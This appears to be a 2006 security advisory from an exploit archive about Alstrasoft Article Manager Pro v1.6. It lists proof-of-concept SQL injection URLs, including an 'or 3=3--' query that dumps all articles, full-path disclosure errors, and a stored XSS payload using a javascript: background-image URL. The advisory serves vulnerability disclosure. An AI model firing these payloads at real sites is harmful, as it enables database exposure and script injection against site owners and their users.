Alstrasoft Article Manager Pro v1.6

2006.05.25
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors Homepage: http://www.alstrasoft.com Description: Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by enabling webmasters to publish articles or news into their website in a matter of minutes with our advance WYSIWYG editor that includes features such as a built-in spell checker, word finder and many more. Effected files: profile.php userarticles.php submit_article.php mraticles.php admin.php Exploits & Vulns: SQL Injection query error http://www.example.com/article/profile.php?author_id=1' 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL Injection: http://www.example.com/article/userarticles.php?aut_id=3 or 3=3-- Proof Of Concept: All articles in DB appear on page when the above query is preformed. Full path errors http://www.example.com/article/userarticles.php?aut_id=3' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/functions.php on line 212 Invalid user id supplied! http://www.example.com/article/mrarticles.php?action=read' Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/mrarticles.php on line 50 http://www.example.com/article/admin/admin.php?login Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html /article/admin/auth.php on line 18 submit_article.php XSS Vuln. When submitting an article using the submit_article.php file, input is not filtered. All the user has to do is enter something like <DIV STYLE="background-image: url(javascript:alert('XSS'))">


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top